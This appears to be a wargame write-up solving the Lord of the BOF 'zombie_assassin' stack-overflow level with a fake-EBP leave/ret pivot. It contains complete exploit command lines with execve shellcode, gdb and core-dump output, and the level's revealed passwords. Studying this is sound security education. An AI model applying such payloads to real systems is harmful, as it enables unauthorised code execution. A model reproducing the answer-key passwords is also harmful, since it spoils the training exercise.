1. intro
2. Code and analysis
2.1. C code
/*
        The Lord of the BOF : The Fellowship of the BOF
        - zombie_assassin
        - FEBP
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strncpy */

int main(int argc, char *argv[])
{
    char buffer[40];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    /* reject a return address that points into the stack (0xbfxxxxxx) */
    if(argv[1][47] == '\xbf')
    {
        printf("stack retbayed you!\n");
        exit(0);
    }

    /* reject a return address that points into libc (0x40xxxxxx) */
    if(argv[1][47] == '\x40')
    {
        printf("library retbayed you, too!!\n");
        exit(0);
    }

    // strncpy instead of strcpy!
    // 48 bytes still overrun the 40-byte buffer: the sfp and the return address are overwritten,
    // but nothing past the return address is copied
    strncpy(buffer, argv[1], 48);
    printf("%s\n", buffer);
    return 0;
}
2.2. Analysis
Identical to the previous level, except for the length that strncpy copies into buffer.
3. Vulnerability check and attack preparation
3.1. Vulnerability
The return address can be tampered with... at this point I'm getting tired of even writing this down, haha.
However, since the copy stops right at the return address, a ret gadget (the ret sled) no longer solves it.
3.2. Attack preparation
Let's think once more about what happens when the program exits.
leave restores ebp; ret loads the value into eip and then executes jmp eip.
Written as assembler (AT&T syntax),
leave is
mov %ebp, %esp   (esp = ebp)
pop %ebp
and ret is, conceptually,
pop %eip
jmp %eip
If, in main's epilogue, we put a chosen value into ebp (i.e. into the sfp) and place a leave & ret gadget at the return address slot, ebp will be set once more and the value following that address will become the return address.
So the payload looks like this:
dummy 40 bytes + sfp (actual ret - 4 bytes, i.e. the address of the fake ebp) 4 bytes + ret (leave & ret gadget) 4 bytes
+ dummy (fake ebp) 4 bytes + ret (address of the actual ret val, fake ebp + 4) 4 bytes + actual ret val 4 bytes + nop & shellcode
As for the gadget, main's own should do.
0x80484df <main+159>: leave
0x80484e0 <main+160>: ret
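To make the two epilogues concrete, here is an added simulation (not part of the original post) of leave ; ret over a constructed stack image laid out like the payload above. The buffer address, sfp slot and gadget address are taken from the gdb dump in this post; the shellcode is replaced by NOPs, since only the control-flow chain is traced.

```python
import struct

# Constructed stack image modelled on the gdb dump in this post:
# buffer[40] starts at 0xbffffbcc, sfp at 0xbffffbf4, main's ret at 0xbffffbf8.
BUF_ADDR = 0xBFFFFBCC
SFP_ADDR = BUF_ADDR + 40          # 0xbffffbf4: saved ebp of main
GADGET   = 0x080484DF             # main+159: leave ; ret (from the post)
FAKE_EBP = SFP_ADDR + 8           # 0xbffffbfc: the "fake ebp" dummy slot
NOP_SLED = FAKE_EBP + 12          # 0xbffffc08: start of the nop sled

def build_stack():
    """Byte image of the stack from buffer start, laid out as in section 3.2.
    The shellcode is replaced by NOPs (constructed sample; only the chain matters)."""
    img = b"A" * 40                              # buffer
    img += struct.pack("<I", FAKE_EBP)           # sfp  -> address of the fake ebp
    img += struct.pack("<I", GADGET)             # ret  -> leave ; ret gadget
    img += b"DDDD"                               # fake ebp (value itself is never used)
    img += struct.pack("<I", NOP_SLED)           # popped as eip by the gadget's ret
    img += struct.pack("<I", NOP_SLED + 4)       # the post's "actual ret val" slot
    img += b"\x90" * 0x30                        # nop sled
    return bytearray(img)

def leave_ret(mem, base, ebp):
    """Simulate 'leave ; ret' on a 32-bit little-endian stack image.
    leave: esp = ebp ; pop ebp.  ret: pop eip.  Returns (eip, ebp, esp)."""
    rd = lambda addr: struct.unpack_from("<I", mem, addr - base)[0]
    esp = ebp
    ebp, esp = rd(esp), esp + 4
    eip, esp = rd(esp), esp + 4
    return eip, ebp, esp

def trace_chain(mem, base, main_ebp, gadget, limit=8):
    """Run main's epilogue, then keep running the gadget while eip lands on it.
    Returns the eip values in order, ending with the first non-gadget eip."""
    eip, ebp, esp = leave_ret(mem, base, main_ebp)
    eips = [eip]
    while eip == gadget and len(eips) < limit:
        eip, ebp, esp = leave_ret(mem, base, ebp)
        eips.append(eip)
    return eips

if __name__ == "__main__":
    stack = build_stack()
    chain = trace_chain(stack, BUF_ADDR, SFP_ADDR, GADGET)
    for i, e in enumerate(chain):
        print(f"ret #{i + 1}: eip = {e:#010x}")
    landing = stack[chain[-1] - BUF_ADDR]
    print("landed on a NOP" if landing == 0x90 else "landed elsewhere")
```

The trace shows that the gadget's ret takes eip directly from the slot at fake ebp + 4, so that slot must already hold the address of the nop sled.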
Writing a rough payload and checking the actual addresses gives the following.
(gdb) r `python -c 'print "A"*40 + "BBBB" + "\xdf\x84\x04\x08" + "CCCC" + "DDDD" + "EEEE" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
Starting program: /home/assassin/zombie_assassia `python -c 'print "A"*40 + "BBBB" + "\xdf\x84\x04\x08" + "CCCC" + "DDDD" + "EEEE" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
/bin/bash2: /home/bugbear/.bashrc: Permission denied
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB߄
Program received signal SIGSEGV, Segmentation fault.
0x80484df in main ()
(gdb) x/40x $esp - 40
....
0xbffffbd8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbe8: 0x41414141 0x41414141 0x41414141 0x42424242
0xbffffbf8: 0x080484df 0x43434343 0x44444444 0x45454545
0xbffffc08: 0x90909090 0x90909090 0x90909090 0x90909090
4. Exploit
Based on the above, write the payload and try it.
(gdb) r `python -c 'print "A"*40 + "\xfc\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\x08\xfc\xff\xbf" + "\x0c\xfc\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
Starting program: /home/assassin/zombie_assassia `python -c 'print "A"*40 + "\xfc\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\x08\xfc\xff\xbf" + "\x0c\xfc\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
/bin/bash2: /home/bugbear/.bashrc: Permission denied
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
Program received signal SIGINT, Interrupt.
0xbffffc0c in ?? ()
(gdb) c
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142 rtld.c: No such file or directory.
(gdb) c
Continuing.
euid = 515
pushing me away
It works in gdb, but not when the binary is run directly.
[assassin@localhost assassin]$ ./zombie_assassia `python -c 'print "A"*40 + "\xfc\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\x08\xfc\xff\xbf" + "\x0c\xfc\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
Segmentation fault (core dumped)
Let's open up the core file.
[assassin@localhost assassin]$ gdb -c core
...
Program terminated with signal 11, Segmentation fault.
#0 0x90909090 in ?? ()
...
(gdb) x/40x $esp-41
0xbffffbdb: 0x41414141 0x41414141 0x41414141 0xbffffbfc
0xbffffbeb: 0x080484df 0x44444444 0xbffffc08 0xbffffc0c
0xbffffbfb: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc0b: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc1b: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc2b: 0xc289c031 0x6850c189 0x73736170 0x796d2f68
0xbffffc3b: 0x622f682d 0xe3896e69 0x80cd0bb0 0x44575000
0xbffffc4b: 0x6f682f3d 0x612f656d 0x73617373 0x006e6973
0xbffffc5b: 0x4f4d4552 0x4f484554 0x313d5453 0x312e3239
0xbffffc6b: 0x312e3836 0x00312e37 0x54534f48 0x454d414e
Adjusted the addresses based on this and retried.
[assassin@localhost assassin]$ ./zombie_assassia `python -c 'print "A"*40 + "\xf3\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\xf7\xfb\xff\xbf" + "\xfa\xfb\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
euid = 515
pushing me away
[assassin@localhost assassin]$ ./zombie_assassin `python -c 'print "A"*40 + "\xf3\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\xf7\xfb\xff\xbf" + "\xfa\xfb\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
euid = 516
no place to hide